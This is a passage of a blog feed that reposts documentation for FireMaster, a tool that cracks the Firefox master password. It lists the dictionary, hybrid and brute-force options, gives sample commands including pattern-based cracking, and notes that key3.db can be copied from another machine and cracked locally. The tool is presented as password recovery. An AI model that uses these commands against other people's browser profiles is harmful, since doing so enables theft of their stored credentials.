left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code" style="vertical-align: bottom; font-family: monospace; font-size: 12px; font-weight: normal; font-style: normal; text-align: left; background-color: rgb(12, 12, 12); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Brute Force Crack Options:&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;table cellpadding="0" cellspacing="0" style="width: 100%; height: 105px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-top-color: rgb(48, 48, 48); border-right-color: rgb(48, 48, 48); border-bottom-color: rgb(48, 48, 48); border-left-color: rgb(48, 48, 48); vertical-align: middle; text-align: justify; background-color: rgb(0, 0, 0); "&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="width: 10%; vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -b&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Perform brute force crack&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -c&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Character list used for brute force cracking process&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -m&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;[Optional] Specify the minimum length of password&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -l&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Specify the maximum length of password&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   -p &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;[Optional] Specify the pattern for the password&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_sub_subheader" style="font-size: 11px; font-weight: bold; font-family: Verdana; vertical-align: middle; text-align: left; letter-spacing: 1px; background-color: rgb(8, 8, 8); border-bottom-style: solid; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Sample Usage Information&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code_comment" style="vertical-align: bottom; text-align: left; font-family: monospace; font-size: 12px; font-weight: normal; font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;// Dictionary Crack&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code" style="vertical-align: bottom; font-family: monospace; font-size: 12px; font-weight: normal; font-style: normal; text-align: left; background-color: rgb(12, 12, 12); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster.exe -d -f c:\dictfile.txt Firefox_Profile_Path&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code_comment" style="vertical-align: bottom; text-align: left; font-family: monospace; font-size: 12px; font-weight: normal; font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;// Hybrid Crack&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code" style="vertical-align: bottom; font-family: monospace; font-size: 12px; font-weight: normal; font-style: normal; text-align: left; background-color: rgb(12, 12, 12); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s Firefox_Profile_Path&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code_comment" style="vertical-align: bottom; text-align: left; font-family: monospace; font-size: 12px; font-weight: normal; font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; // Brute Force Crack&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code" style="vertical-align: bottom; font-family: monospace; font-size: 12px; font-weight: normal; font-style: normal; text-align: left; background-color: rgb(12, 12, 12); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" Firefox_Profile_Path&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Here Firefox_Profile_Path refers to the directory where key3.db file is present. This points to the Firefox profile directory (Ex: C:\Documents and Settings\&lt;user&gt;\Application Data\Mozilla\Firefox\Profiles\&lt;prof&gt;) on your machine. However you can also copy key3.db file from any other machine such as Linux system to your local windows machine and specify that path during recovering operation.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Quiet mode ( -q option ) will disable printing each password while recovery is in progress. This makes it much faster especially for brute force operation. However during brute force operation if the password count exceeds 50000 passwords then it automatically enters the quiet mode.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Hybrid method tries normal dictionary password as well as password created by appending/prefixing the generated strings to the dictionary word. For example if the dictionary word is "test" and you have specified character set as '123' (-c 123 -s) then the new passwords will be test1, test12, test123, test32 etc.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Character list (-g for hybrid and -c for brute force) specifies the characters to be used for generating passwords. If you don't specify then the default character list is used. For brute force -m indicates the minimum length of password to be generated. This can reduce the generated passwords and hence the time considerably when large number of character set is specified. Similarly -l (small 'L') specifies the maximum length of password to be generated. For example, if you specify -m 6 and -l 8 then only passwords which are of length at least 6 and above but below 8 will be generated. &lt;br /&gt;&lt;br /&gt;Now you can reduce the password cracking time significantly using pattern based password recovery mechanism. If you know that password is of certain length and also remember few characters then you can specify that pattern for brute force cracking. For example, assume that you have set the master password of length 12 and it begins with 'fire' and ends with '123' then command will look like below&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_code" style="vertical-align: bottom; font-family: monospace; font-size: 12px; font-weight: normal; font-style: normal; text-align: left; background-color: rgb(12, 12, 12); "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster.exe -b -c "abyz" -l 12 -p "fire?????123" c:\testpath&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;This will reduce the time to seconds which otherwise would have taken days or hours to crack that password. You can even crack the impossible looking passwords using the right pattern.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster in Action&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;a href="http://securityxploded.com/images/firemaster.jpg" style="font-weight: normal; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;&lt;img alt="Firemaster in Action" src="http://securityxploded.com/images/firemaster.jpg" width="520" height="489" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster and FireFox&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster is tested with latest Firefox version 3.0 and should work with any Firefox having version 1.0 or more.&lt;br /&gt;&lt;br /&gt;If the FireMaster failed to work with your Firefox then please send me the key3.db and cert8.db (required for older versions) files which are present in your Firefox profile directory. Note that sign-on credentials are stored in the signons.txt file and key3.db just contains the master password related information. So even if some one knows your master password it will be useless unless he/she has access to signons.txt file.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Disclaimer&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster is designed with good intention to recover the lost master password so that every one keep enjoying their experience with Firefox. Like any other tool its use either good or bad, depends upon the user who uses it. However author is not responsible for damages or impact caused due to misuse of FireMaster.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Acknowledgement&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Thanks to the Mozilla-Firefox crew for making such an excellent, beautiful, free browser.&lt;br /&gt;&lt;br /&gt;Thanks to everyone who shared their experience with FireMaster and sending the valuable feedbacks and suggestions.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Download FireMaster&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;div style="text-align: justify; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;If you want to build the FireMaster from the source then you need to download the Gecko SDK from &lt;/span&gt;&lt;/span&gt;&lt;a href="http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7/gecko-sdk-i586-pc-msvc-1.7.zip" style="font-weight: normal; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Mozilla website.&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://securityxploded.com/download.php#firemaster" style="font-weight: normal; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FireMaster 3.1 binary &amp;amp; source download&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="page_subheader" style="font-weight: bold; font-size: 14px; font-family: 'Times New Roman'; text-decoration: none; background-color: rgb(12, 12, 12); text-align: left; vertical-align: middle; letter-spacing: 1px; border-bottom-width: 1px; border-bottom-color: rgb(25, 25, 25); border-bottom-style: solid; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;See Also&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   &lt;/span&gt;&lt;/span&gt;&lt;a href="http://nagareshwar.securityxploded.com/2008/03/31/firemaster-with-pattern-based-password-recovery/" style="font-weight: normal; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Using FireMaster with pattern based recovery technique&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   &lt;/span&gt;&lt;/span&gt;&lt;a href="http://securityxploded.com/firepassword.php" style="font-weight: normal; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;FirePassword&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;: The Firefox Username &amp;amp; Password List Decryptor&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   &lt;/span&gt;&lt;/span&gt;&lt;a href="http://securityxploded.com/netsharemonitor.php" style="font-weight: normal; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;NetShareMonitor&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;: Monitor your shares from intruders.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="vertical-align: bottom; text-align: left; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;   &lt;/span&gt;&lt;/span&gt;&lt;a href="http://securityxploded.com/rainbowcrack.php" style="font-weight: normal; text-decoration: none; "&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;Recover Windows password in seconds using Rainbow crack.&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: rgb(255, 102, 102);"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8915849482146711031?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8915849482146711031/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8915849482146711031' title='1 Comments'/><link rel='edit' 